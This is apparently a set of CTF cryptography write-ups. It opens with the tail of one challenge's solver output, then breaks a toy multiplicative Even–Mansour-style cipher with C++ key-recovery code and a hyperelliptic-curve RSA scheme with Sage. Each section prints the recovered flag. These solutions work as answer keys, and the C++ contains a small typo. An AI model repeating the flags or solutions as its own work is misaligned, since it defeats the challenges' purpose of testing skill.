22: 2059 2089 2021 1962 2057 2037 2001 2127 2041 2032 2029 2162 1951 2071 2023 1994 2157 2102 2069 2090 1992 2143 2119 1988 2083 2018 2055 2131 2116 2070 2068 2015
33: 2107 1909 2033 2044 1990 2179 1974 2050 2205 2104 2092 2076 2054 2171 2161 2015
44: 1892 2019 2152 2016 2275 2084 2173 2158
55: 1865 2021 2272 2313
64: 1908 2554
PoW done
b'message: '
'hxp says hi <3'
b'x0: '
778839742531702085085918402323
b'x1: '
767810811277392870554785268207
b'x2: '
533823740576130506591957937542
b'x3: '
406048316929611234580511618372
b'x4: '
917595194209625280535310293132
b'x5: '
98697750238179915891908495330
b'x6: '
551743936488196518412877796684
b'x7: '
962597283591884938034877019337
b'x8: '
786844723262420032812069542526
b'x9: '
153320670470652943712842694641
b'x10: '
378095423297957378355258043727
b'x11: '
953702789823393737483018538503
b'x12: '
182193542884503780939807852848
b'x13: '
46495574229303804465885559630
b'x14: '
595631858452843522184816514055
b'x15: '
58666905983251272690678338677
b'x16: '
283554279898585069086241687161
b'x17: '
84880053022417755331634480195
b'x18: '
521647021209199036075434406048
b'x19: '
384899853088268825825438159613
b'x20: '
567960805944765918951751597198
b'x21: '
672107144804729904594270852913
b'x22: '
541045749332302907100746368583
b'x23: '
92824571709438415986293186286
b'x24: '
477147860488926799302982864269
b'x25: '
338163136407181436575863421171
b'x26: '
972280614719358362962864483493
b'x27: '
436626897223963794966197005647
b'x28: '
558217022539528839195305267721
b'x29: '
125243008830069384201451225092
b'x30: '
621734819720870576083660228285
b'x31: '
118761737325065505597396904205
b'x32: '
627480934295185641796962719819
b'x33: '
758905517622845846307886470180
b'x34: '
141211197519816039577798386292
b'x35: '
392146911880054924027563031799
b'x36: '
566111529644772961628208269856
b'x37: '
548693776779838000511853166180
b'x38: '
331531753239151634777122549477
b'x39: '
759036502233547269036820334115
b'x40: '
11018713707098210728900499136
b'x41: '
906703021096737735178206938192
b'x42: '
734213979648936229894080649422
b'x43: '
638704139451788125588461207264
b'x44: '
46707244256760448287934430536
b'x45: '
978627963455096158454839000558
b'x46: '
72990589689741453572135904905
b'x47: '
877633260085019814260895648090
b'x48: '
256930679356950403881760627528
b'x49: '
792820765417180381752478023807
b'x50: '
344223671332224711494990326115
b'x51: '
980971256788779058167186917372
b'x52: '
334524080250831856206886309133
b'x53: '
746190096546671689250644207305
b'x54: '
567687287704628586183874509373
b'x55: '
476331428542598362586002069710
b'x56: '
423087411891158399168500472004
b'x57: '
72163376030501636444997178485
b'x58: '
709628295038186534429098402709
b'x59: '
472082433020220515600036333065
b'x60: '
701911320993688779387178774929
b'x61: '
435885933415343827864793767375
b'x62: '
125164298654176511111017028113
b'x63: '
601185399153238162757103066613
b'v: '
flag{babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxby}
fin
*** Connection closed by remote host ***
This task consisted of a remarkably simple block cipher, of which we’re given $2^{24}$ plaintext‑ciphertext pairs:
#!/usr/bin/python2
import random
from struct import pack,unpack
from flag import flag
P = 247359019496198933
C = 223805275076627807
M = 2**60
K0 = random.randint(1, P-1)
K1 = random.randint(1, P-1)
# not a bijection? can be adjusted but I'm lazy
def encrypt_block(x):
tmp = x * K0 % P
tmp = tmp * C % M
tmp = tmp * K1 % P
return tmp
for i in range(2**24):
pt = random.randint(1, P-1)
ct = encrypt_block(pt)
print pt, ct
pt = flag[5:-1]
assert flag.startswith('flag{') and flag.endswith('}') and len(pt)%8==0
fmt = '%dQ' % (len(pt)/8)
ct = pack(fmt, *map(encrypt_block, unpack(fmt, pt)))
print ct.encode('hex')
So, the only thing that’s really happening here is two multiplications modulo $p$ with secrets, with an application of a publicly known function \[ \label{pi}\tag{$\ast$} \pi\colon\quad \mathbb Z/p\to\mathbb Z/p,\; a \mapsto a\cdot c\bmod 2^{60} \] in between.
After unsuccessfully trying for a while to make use of some mathematical interaction between the $\bmod p$ and the $\bmod 2^{60}$ part, the structure of the cipher reminded me of the Even–Mansour scheme, which encrypts as \[ x \longmapsto K_1 \oplus \pi(K_0\oplus x) \,\text, \] where $\pi$ is some permutation. For comparison, the challenge uses \[ x \longmapsto K_1 \cdot \pi(K_0\cdot x) \,\text, \] where everything is modulo $p$ and $\pi$ is the function $\eqref{pi}$.
Searching for attacks against E–M, I quickly found this paper, which gives a $2^{n-d}$ attack when $n$ is the block size and $2^d$ plaintext-ciphertext pairs are known. Here, $n\approx 58$ and $d\approx 24$, so — of course assuming the attack generalizes — we would expect about $2^{34}$ work, which is very feasible.
I’ll skip repeating the explanation of how the paper breaks original E–M; it is explained very clearly in Section 3.2. Instead, let’s get straight to the version of the attack that breaks the CTF challenge:
Here’s a C++ implementation of this step:
using u64 = uint64_t;
using u128 = __uint128_t;
const u64 p = 247359019496198933;
const u64 c = 223805275076627807;
const u64 m = ((u64) 1) << 60;
static u64 pi(u64 a)
{
return c * a % m % p;
}
static u64 mul(u64 a, u64 b)
{
return (u128) a * (u128) b % (u128) p;
}
static std::tuple<int64_t,int64_t,int64_t> xgcd(int64_t x, int64_t y)
{
std::vector<int64_t> qs;
qs.reserve(64);
while (y) {
int64_t q = x / y;
int64_t r = x % y;
qs.push_back(q);
x = y;
y = r;
}
int64_t a = 1, b = 0;
while (!qs.empty()) {
int64_t t = b;
b = a - qs.back() * b;
a = t;
qs.pop_back();
}
return {x,a,b};
}
static u64 inv(u64 a)
{
auto t = xgcd(a, p);
assert(std::get<0>(t) == 1);
int64_t r = std::get<1>(t);
if (r < 0) r += p;
assert(0 <= r && (u64) r < p);
assert(mul(r,a) == 1);
return r;
}
std::vector<std::pair<u64,u64>> xys; /* loaded by main() */
std::optional<u64> find_k0(u64 lambda)
{
std::unordered_map<u64,u64> tab;
for (auto const& xy: xys) {
u64 x, y;
std::tie(x,y) = xy;
u64 inv_x = inv(x);
u64 v = mul(y, pi(mul(lambda, inv_x)));
auto it = tab.find(v);
if (it != tab.end()) {
u64 k0 = mul(lambda, inv(mul(x, it->second)));
std::cout << lambda << " ~> " << k0 << std::endl;
return k0;
}
tab[v] = x;
}
std::cout lambda << " ~> fail" << std::endl;
return {};
}
After running this for a little longer than 5 core hours with random choices of lambda
, we got a candidate $K_0 = 134854706973672807$. Solving for $K_1$ given $K_0$ is easy, and indeed it turned out that the given plaintext-ciphertext pairs were consistent with this guess for $K_0$ (i.e., all gave the same $K_1$ value).
Now that we’ve recovered the key, the last thing to do is to brute-force away the non-uniqueness of decryption, which was hinted at by the comment
# not a bijection? can be adjusted but I'm lazy
This is again an easy task. Note there are two operations which destroy information: Right at the input, which is considered only modulo $p$, and then again at the $\pi$ part (which is only a function on $\mathbb Z/p$ but not a permutation).
Filtering for potential plaintexts that were valid ASCII left us with the following choices:
--> w9K
[ h@
c3_7o_br1/n1I!'UfoR_thE_5ign0Ra.
--> w9K
[ h@
c3_7o_br1ng_tHis_foR_thE_5ign0Ra.
--> w9K
[_a5k3d_m3_7o_br1/n1I!'UfoR_thE_5ign0Ra.
--> w9K
[_a5k3d_m3_7o_br1ng_tHis_foR_thE_5ign0Ra.
--> _p4droNe h@
c3_7o_br1/n1I!'UfoR_thE_5ign0Ra.
--> _p4droNe h@
c3_7o_br1ng_tHis_foR_thE_5ign0Ra.
--> _p4droNe_a5k3d_m3_7o_br1/n1I!'UfoR_thE_5ign0Ra.
--> _p4droNe_a5k3d_m3_7o_br1ng_tHis_foR_thE_5ign0Ra.
This task consisted of an RSA-style encryption scheme based on a hyperelliptic genus-2 curve defined over $\mathbb F_{2^{256}}$.
The code greets us with scary functions such as this:
def add(p1, p2):
a1, b1 = p1
a2, b2 = p2
d1, e1, e2 = xgcd(a1, a2)
d, c1, c2 = xgcd(d1, b1+b2+h)
di = PP(1/d)
a = a1*a2*di*di
b = (c1*e1*a1*b2+c1*e2*a2*b1+c2*(b1*b2+f))*di
b %= a
while a.degree() > 2:
a = PP((f-b*h-b*b)/a)
b = (-h-b)%a
a = a.monic()
return a, b
…but after staring at this for a bit I recognized the familiar Mumford coordinate system for Jacobians of hyperelliptic curves.
Since the challenge performed an RSA-style encryption, the goal was clear: Compute the group order. Generally, point counting on higher-dimensional abelian varieties is rather painful, but there’s a shortcut in this case: The curve is in fact defined over $\mathbb F_2$! By general theory, we can easily describe the order of the Jacobian over extension fields when given the characteristic polynomial of the Frobenius endomorphism over the base field, which is really easy here because $\mathbb F_2$ is literally the smallest field.
Here’s (a shortened and paraphrased version of) the relevant Theorem 14.17 from the Handbook of Elliptic and Hyperelliptic Curve Cryptography (p. 311 in the 2nd edition):
Theorem. Let $C$ be a genus-$g$ hyperelliptic curve defined over $\mathbb F_q$ and let the factorization of the characteristic polynomial $\chi\in\mathbb Z[T]$ of its $\mathbb F_q$‑Frobenius endomorphism be \[ \chi(T) = \prod_{i=1}^{2g} (T-\tau_i) \;\in \mathbb C[T] \,\text. \] Then (among other things) \[ \lvert J_C(\mathbb F_{q^r})\rvert = \prod_{i=1}^{2g} (1-\tau_i^r) \,\text. \]
Hence, we may simply compute the Frobenius polynomial over $\mathbb F_2$ and very easily deduce the order of the Jacobian over $\mathbb F_{2^{256}}$ from that! Using the definitions from the given chall.sage
:
C = HyperellipticCurve(f,h)
C = C.change_ring(GF(2))
print(C)
g = C.genus()
print('genus:', g)
pi = C.frobenius_polynomial()
print('π =', pi.factor())
rs = pi.roots(ring=QQbar)
rs = sum(([r]*m for r,m in rs), [])
assert len(rs) == 2*g
print(rs)
N = ZZ(prod(1-r**256 for r in rs))
print(N)
print(factor(N))
ctext = ([113832590633816699072296178013238414056344242047498922038140127850188287361982, 107565990181246983920093578624450838959059911990845389169965709337104431186583, 1], [60811562094598445636243277376189331059312500825950206260715002194681628361141, 109257511993433204574833526052641479730322989843001720806658798963521316354418])
ctext = tuple(sum(F.fetch_int(c)*w**i for i,c in enumerate(cs)) for cs in ctext)
ptext = mul(ctext, ZZ(Mod(e,N)**-1))
flag = decode(ptext)
print(ZZ(flag[0][0]))
print(bytes.fromhex('{:x}'.format(ZZ(flag[0][0]))))
This kills the crab prints the flag:
Hyperelliptic Curve over Finite Field of size 2 defined by y^2 + (x^2 + x)*y = x^5 + x^3 + 1
genus: 2
π = x^4 - x^2 + 4
[-1.118033988749895? - 0.866025403784439?*I, -1.118033988749895? + 0.866025403784439?*I, 1.118033988749895? - 0.866025403784439?*I, 1.118033988749895? + 0.866025403784439?*I]
13407807929942597099574024998205846127384782207827457971403006387925941306569427075743805985793764139096494648696821820448189053384542053304334065342873600
2^18 * 3^2 * 5^2 * 17^4 * 113^2 * 137^2 * 769^2 * 9601^2 * 138113^2 * 5649473^2 * 170045569^2 * 2147442977^2 * 1601948502115309903982784222721^2
[z256^245 + z256^244 + z256^240 + z256^238 + z256^237 + z256^235 + z256^234 + z256^233 + z256^230 + z256^228 + z256^226 + z256^222 + z256^221 + z256^218 + z256^216 + z256^214 + z256^213 + z256^212 + z256^209 + z256^206 + z256^205 + z256^202 + z256^200 + z256^197 + z256^196 + z256^194 + z256^192 + z256^190 + z256^189 + z256^188 + z256^186 + z256^182 + z256^181 + z256^179 + z256^176 + z256^174 + z256^173 + z256^171 + z256^170 + z256^169 + z256^166 + z256^162 + z256^161 + z256^160 + z256^158 + z256^156 + z256^155 + z256^154 + z256^153 + z256^152 + z256^150 + z256^147 + z256^142 + z256^141 + z256^140 + z256^139 + z256^136 + z256^134 + z256^133 + z256^132 + z256^125 + z256^124 + z256^121 + z256^120 + z256^118 + z256^117 + z256^116 + z256^113 + z256^110 + z256^109 + z256^106 + z256^104 + z256^101 + z256^100 + z256^96 + z256^93 + z256^92 + z256^88 + z256^86 + z256^85 + z256^83 + z256^80 + z256^78 + z256^76 + z256^70 + z256^69 + z256^68 + z256^66 + z256^62 + z256^61 + z256^59 + z256^56 + z256^54 + z256^53 + z256^49 + z256^48 + z256^46 + z256^44 + z256^43 + z256^42 + z256^41 + z256^40 + z256^38 + z256^37 + z256^33 + z256^32 + z256^30 + z256^29 + z256^28 + z256^26 + z256^24 + z256^22 + z256^21 + z256^20 + z256^17 + z256^14 + z256^13 + z256^12 + z256^10 + z256^9 + z256^5 + z256^4 + z256 + 1, 1]
z256^252 + z256^251 + z256^250 + z256^248 + z256^243 + z256^241 + z256^238 + z256^237 + z256^235 + z256^233 + z256^232 + z256^231 + z256^227 + z256^225 + z256^222 + z256^221 + z256^215 + z256^213 + z256^212 + z256^211 + z256^210 + z256^207 + z256^206 + z256^200 + z256^198 + z256^195 + z256^194 + z256^193 + z256^192 + z256^191 + z256^189 + z256^187 + z256^186 + z256^185 + z256^184 + z256^183 + z256^181 + z256^179 + z256^177 + z256^176 + z256^175 + z256^174 + z256^173 + z256^172 + z256^171 + z256^169 + z256^165 + z256^163 + z256^162 + z256^160 + z256^156 + z256^154 + z256^151 + z256^150 + z256^145 + z256^144 + z256^141 + z256^140 + z256^139 + z256^136 + z256^135 + z256^134 + z256^131 + z256^124 + z256^123 + z256^122 + z256^120 + z256^117 + z256^112 + z256^111 + z256^110 + z256^109 + z256^108 + z256^103 + z256^101 + z256^99 + z256^98 + z256^96 + z256^95 + z256^92 + z256^91 + z256^88 + z256^87 + z256^82 + z256^81 + z256^77 + z256^75 + z256^73 + z256^68 + z256^67 + z256^66 + z256^65 + z256^64 + z256^63 + z256^61 + z256^58 + z256^57 + z256^55 + z256^54 + z256^53 + z256^52 + z256^50 + z256^49 + z256^47 + z256^46 + z256^42 + z256^41 + z256^38 + z256^35 + z256^32 + z256^27 + z256^26 + z256^22 + z256^20 + z256^19 + z256^18 + z256^17 + z256^16 + z256^15 + z256^12 + z256^10 + z256^9 + z256^7 + z256^4 + z256^3
87336973591408809511144500944284390061575902317760214640835643492103517747
b'1nTere5tinG_Hyp3re11iPtic_curv3'